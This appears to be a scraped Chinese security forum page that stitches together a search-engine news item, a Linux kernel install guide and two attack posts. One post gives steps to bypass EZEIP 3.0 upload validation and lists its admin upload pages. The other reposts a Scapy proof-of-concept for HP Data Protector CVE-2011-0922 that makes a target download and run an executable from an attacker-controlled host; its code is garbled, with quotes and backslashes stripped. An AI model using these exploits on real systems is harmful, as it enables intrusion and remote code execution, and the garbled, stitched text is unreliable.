返回列表 发帖

人民搜索推新版新闻搜索 联合中科院建实验室

今天下午,人民搜索在北京宣布推出新版新闻搜索1.0版本。
人民搜索新闻搜索1.0版本主要整合了新闻相关信息,其以新闻事件为核心,把与新闻相关的论坛、博客等信息进行了组合。此外,人民搜索新闻搜索可通过关键词追踪整个新闻事件,把众多新闻与信息整合为“事件单元” ,通过“事件单元”的有序分布来组织和反映相关新闻主题。


人民搜索的总裁邓亚萍表示:“2010年是人民搜索的搜索之年,新闻搜索1.0版本,是对新闻搜索的全面尝试。”她强调,人民搜索面临着前所未有的挑战。

与此同时,人民搜索今日还宣布与中国科学院建立联合搜索引擎实验室。

今年6月20日,人民搜索正式上线测试,其由人民网推出,以新闻为主,由人民日报社和人民网合资组建运营。2010年9月,邓亚萍正式担任人民搜索公司总经理。
附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

 

您可能还想看的主题:

研究人员发现新型“无文件”恶意软件

谷歌在搜索结果中新增网站被黑警告

YouTube连续第三年成为日本搜索量最大关键词

英特尔与腾讯建立联合创新实验室

美新搜索网站Blekko简化搜索结果 挑战谷歌

Google推位置搜索服务 试水新广告市场

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

EZEIP3.0 多页面上传验证漏洞
1.修改IE浏览器的安全设置,调制最高,然而禁止js执行。


2.打开修改上传类型页面,添加aspx类型,点击保存,再打开上传页面上传


存在问题的上传类型页面:
http://www.sitedirsec.com/whir_system/module/config/upload.aspx


上传页面:


http://www.XXX.com/whir_system/module/picture/radiopictureselect.aspx


http://www.XXX.com/whir_system/module/picture/uploadpicture.aspx


http://www.XXX.com/whir_system/module/picture/pictureselect.aspx


http://www.xxxj.com/whir_system/module/picture/picturesingleselect.aspx


http://www.xxx.com/whir_system/module/video/videoupload.aspx


此程序多为政府或中型网站使用,如网络管理员看到应尽快修复。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Linux操作系统中安装内核的方法详细介绍
  
<P style="TEXT-INDENT: 2em">编译完成后, 在 arch/i386/boot目录中会有bzImage映象文件.
<P style="TEXT-INDENT: 2em">
<P style="TEXT-INDENT: 2em">安装内核步骤如下:
<P style="TEXT-INDENT: 2em">(1)在/boot目录下新建mynewkernel目录,并将bzImage拷贝到/boot/mynewkernel目录下:
<P style="TEXT-INDENT: 2em">
<P style="TEXT-INDENT: 2em">$ sudo cp arch/i386/boot/bzImage /boot/mynewkernel
<P style="TEXT-INDENT: 2em">
<P style="TEXT-INDENT: 2em">(2)更改/boot/mynewkernel中bzImage的名字
<P style="TEXT-INDENT: 2em">$ sudo mv bzImage vmlinuz-2.6.17.13
<P style="TEXT-INDENT: 2em">
<P style="TEXT-INDENT: 2em">(3)备份、修改grub配置文件
<P style="TEXT-INDENT: 2em">$sudo cp /boot/grub/menu.lst menu.lst.origin
<P style="TEXT-INDENT: 2em">
<P style="TEXT-INDENT: 2em">修改menu.list,加入以下内容(从既有的menu.list中相关的内容拷贝):
<P style="TEXT-INDENT: 2em">title zp, make defconfig, 2.6.17.13
<P style="TEXT-INDENT: 2em">root (hd0,2)
<P style="TEXT-INDENT: 2em">kernel /boot/mynewkernel/vmlinuz-2.6.17.13 root=/dev/sda3 ro quiet splash
<P style="TEXT-INDENT: 2em">savedefault
<P style="TEXT-INDENT: 2em">boot
<P style="TEXT-INDENT: 2em">
<P style="TEXT-INDENT: 2em">(4)安装模块:
<P style="TEXT-INDENT: 2em">$sudo make modules_install
<P style="TEXT-INDENT: 2em">
<P style="TEXT-INDENT: 2em">reboot, 在grub启动菜单中选择新内核启动。 [/quote]


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

HP Data Protector Client 远程执行代码POC
本帖最后由 vini5 于 2011-5-30 10:31 编辑
<TABLE class=t_table cellSpacing=0>


# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056) </TABLE>
<TABLE class=t_table cellSpacing=0>


# Date: 2011-05-29 </TABLE>
<TABLE class=t_table cellSpacing=0>


# Author: fdisk </TABLE>
<TABLE class=t_table cellSpacing=0>


# Version: 6.11 </TABLE>
<TABLE class=t_table cellSpacing=0>


# Tested on: Windows 2003 Server SP2 en </TABLE>
<TABLE class=t_table cellSpacing=0>


# CVE: CVE-2011-0922  </TABLE>
<TABLE class=t_table cellSpacing=0>


# Notes: ZDI-11-056 </TABLE>
<TABLE class=t_table cellSpacing=0>


# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/  </TABLE>
<TABLE class=t_table cellSpacing=0>


# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143 </TABLE>
<TABLE class=t_table cellSpacing=0>


# </TABLE>
<TABLE class=t_table cellSpacing=0>


# The following PoC instructs an HP Data Protector Client to download and install an .exe file. It tries to get the file  </TABLE>
<TABLE class=t_table cellSpacing=0>


# from a share (\pwn2003se.home.it) and if it fails it tries to access the same file via HTTP. To get the PoC working with  </TABLE>
<TABLE class=t_table cellSpacing=0>


# this payload share a malicious file via HTTP under http://pwn2003se.home.it/Omniback/i386/installservice.exe.exe and you are done.  </TABLE>
<TABLE class=t_table cellSpacing=0>


# Tweak payload to better suit your needs. </TABLE>
<TABLE class=t_table cellSpacing=0>


# </TABLE>
<TABLE class=t_table cellSpacing=0>


# Since youre crafting packets with Scapy dont forget to use iptables to block the outbound resets or your host will  </TABLE>
<TABLE class=t_table cellSpacing=0>


# reset your connection after receiving and unsolicited SYN/ACK that is not associated with any open session/socket. Have Fun. </TABLE>
<TABLE class=t_table cellSpacing=0>


# Special thanks to all the Exploit-DB Dev Team. </TABLE>








from scapy.all import *




if len(sys.argv) != 2:




    print Usage: ./ZDI-11-056.py <Target IP>




    sys.exit(1)




target = sys.argv[1]




payload = (




x00x00x01xbexffxfex32x00x00x00x20x00x70x00x77x00x6ex00x32x00




x30x00x30x00x33x00x73x00x65x00x2ex00x68x00x6fx00




x6dx00x65x00x2ex00x69x00x74x00x00x00x20x00x30x00




x00x00x20x00x53x00x59x00x53x00x54x00x45x00x4dx00




x00x00x20x00x4ex00x54x00x20x00x41x00x55x00x54x00




x48x00x4fx00x52x00x49x00x54x00x59x00x00x00x20x00




x43x00x00x00x20x00x32x00x36x00x00x00x20x00x5cx00




x5cx00x70x00x77x00x6ex00x32x00x30x00x30x00x33x00




x53x00x45x00x2ex00x68x00x6fx00x6dx00x65x00x2ex00




x69x00x74x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00




x61x00x63x00x6bx00x5cx00x69x00x33x00x38x00x36x00




x5cx00x69x00x6ex00x73x00x74x00x61x00x6cx00x6cx00




x73x00x65x00x72x00x76x00x69x00x63x00x65x00x2ex00




x65x00x78x00x65x00x20x00x2dx00x73x00x6fx00x75x00




x72x00x63x00x65x00x20x00x5cx00x5cx00x70x00x77x00




x6ex00x32x00x30x00x30x00x33x00x53x00x45x00x2ex00




x68x00x6fx00x6dx00x65x00x2ex00x69x00x74x00x5cx00




x4fx00x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00




x20x00x00x00x20x00x5cx00x5cx00x70x00x77x00x4ex00




x32x00x30x00x30x00x33x00x53x00x45x00x5cx00x4fx00




x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00x5cx00




x69x00x33x00x38x00x36x00x5cx00x69x00x6ex00x73x00




x74x00x61x00x6cx00x6cx00x73x00x65x00x72x00x76x00




x69x00x63x00x65x00x2ex00x65x00x78x00x65x00x20x00




x2dx00x73x00x6fx00x75x00x72x00x63x00x65x00x20x00




x5cx00x5cx00x70x00x77x00x4ex00x32x00x30x00x30x00




x33x00x53x00x45x00x5cx00x4fx00x6dx00x6ex00x69x00




x62x00x61x00x63x00x6bx00x20x00x00x00x00x00




x00x00x02x54




xffxfex32x00x36x00x00x00x20x00x5bx00x30x00x5dx00




x41x00x44x00x44x00x2fx00x55x00x50x00x47x00x52x00




x41x00x44x00x45x00x0ax00x5cx00x5cx00x70x00x77x00




x6ex00x32x00x30x00x30x00x33x00x53x00x45x00x2ex00




x68x00x6fx00x6dx00x65x00x2ex00x69x00x74x00x5cx00




x4fx00x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00




x5cx00x69x00x33x00x38x00x36x00x0ax00x49x00x4ex00




x53x00x54x00x41x00x4cx00x4cx00x41x00x54x00x49x00




x4fx00x4ex00x54x00x59x00x50x00x45x00x3dx00x22x00




x43x00x6cx00x69x00x65x00x6ex00x74x00x22x00x20x00




x43x00x45x00x4cx00x4cx00x4ex00x41x00x4dx00x45x00




x3dx00x22x00x70x00x77x00x6ex00x32x00x30x00x30x00




x33x00x73x00x65x00x2ex00x68x00x6fx00x6dx00x65x00




x2ex00x69x00x74x00x22x00x20x00x43x00x45x00x4cx00




x4cx00x43x00x4cx00x49x00x45x00x4ex00x54x00x4ex00




x41x00x4dx00x45x00x3dx00x22x00x73x00x65x00x63x00




x75x00x72x00x6ex00x65x00x74x00x2dx00x62x00x32x00




x75x00x64x00x66x00x76x00x2ex00x68x00x6fx00x6dx00




x65x00x2ex00x69x00x74x00x22x00x20x00x41x00x4cx00




x4cx00x55x00x53x00x45x00x52x00x53x00x3dx00x35x00




x20x00x49x00x4ex00x53x00x54x00x41x00x4cx00x4cx00




x44x00x49x00x52x00x3dx00x22x00x24x00x28x00x4fx00




x4dx00x4ex00x49x00x42x00x41x00x43x00x4bx00x29x00




x5cx00x22x00x20x00x50x00x52x00x4fx00x47x00x52x00




x41x00x4dx00x44x00x41x00x54x00x41x00x3dx00x22x00




x24x00x28x00x44x00x41x00x54x00x41x00x4fx00x4dx00




x4ex00x49x00x42x00x41x00x43x00x4bx00x29x00x5cx00




x22x00x20x00x49x00x4ex00x45x00x54x00x50x00x4fx00




x52x00x54x00x3dx00x35x00x35x00x35x00x35x00x20x00




x41x00x44x00x44x00x4cx00x4fx00x43x00x41x00x4cx00




x3dx00x63x00x6fx00x72x00x65x00x2cx00x6ax00x61x00




x76x00x61x00x67x00x75x00x69x00x20x00x4fx00x50x00




x54x00x5fx00x44x00x4ex00x53x00x43x00x48x00x45x00




x43x00x4bx00x3dx00x31x00x20x00x4fx00x50x00x54x00




x5fx00x53x00x4bx00x49x00x50x00x49x00x4dx00x50x00




x4fx00x52x00x54x00x3dx00x31x00x20x00x4fx00x50x00




x54x00x5fx00x4dx00x53x00x47x00x3dx00x31x00x0ax00




x00x00x00x00)




ip=IP(dst=target)




SYN=TCP(sport=31337 dport=5555 flags=S)




packet=ip/SYN




SYNACK=sr1(packet)




my_ack = SYNACK.seq + 1




print SYNACK.seq




print my_ack




ACK=TCP(sport=31337 dport=5555 flags=A seq=1 ack=my_ack)




send(ip/ACK)




PUSH=TCP(sport=31337 dport=5555 flags=PA seq=1 ack=my_ack)




send(ip/PUSH/payload)复制代码


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表